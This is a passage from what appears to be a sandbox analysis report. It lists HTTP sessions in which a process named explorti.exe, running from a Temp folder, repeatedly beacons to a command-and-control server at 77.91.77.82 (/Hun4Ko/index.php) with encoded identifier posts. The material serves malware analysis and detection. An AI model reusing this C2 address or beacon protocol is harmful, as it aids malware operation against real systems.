                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:35.545243979 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:35 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      95192.168.2.44983477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:35.555273056 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:36.277028084 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:36 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      96192.168.2.44983577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:36.398866892 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:37.137135983 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      97192.168.2.44983677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:37.157761097 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:38.034975052 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:37 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      98192.168.2.44983777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:38.154944897 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:38.867815018 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:38 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      99192.168.2.44983877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:38.883759975 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:39.649194002 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:39 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      100192.168.2.44983977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:39.835091114 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:40.599473000 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:40 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      101192.168.2.44984077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:40.613379955 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:41.404984951 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:41 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      102192.168.2.44984177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:41.524367094 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:42.219577074 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      103192.168.2.44984277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:42.258207083 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:43.012959003 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:42 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      104192.168.2.44984377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:43.134654999 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:43.953273058 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:43 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      105192.168.2.44984477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:43.963565111 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:44.673679113 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:44 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      106192.168.2.44984577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:44.789644003 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:45.597744942 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:45 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      107192.168.2.44984677.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:45.608828068 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:46.319753885 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:46 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      108192.168.2.44984777.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:46.442516088 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:47.504098892 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jun 28, 2024 21:17:47.505907059 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:47 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      109192.168.2.44984877.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:47.513143063 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:48.280229092 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:48 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      110192.168.2.44984977.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:48.398947001 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:49.155213118 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      111192.168.2.44985077.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:49.200535059 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:50.057576895 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:49 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      112192.168.2.44985177.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:50.186063051 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:50.877950907 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:50 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      113192.168.2.44985277.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:50.886723042 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:51.685846090 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:51 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      114192.168.2.44985377.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:51.805195093 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:52.523957968 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:52 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      115192.168.2.44985477.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:52.535712957 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 154
                      Cache-Control: no-cache
                      Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 32 32 46 37 39 42 33 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                      Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B22F79B35982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                      Jun 28, 2024 21:17:53.307565928 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:53 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      116192.168.2.44985577.91.77.82804908C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                      TimestampBytes transferredDirectionData
                      Jun 28, 2024 21:17:53.437434912 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 77.91.77.82
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jun 28, 2024 21:17:54.140544891 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Fri, 28 Jun 2024 19:17:54 GMT
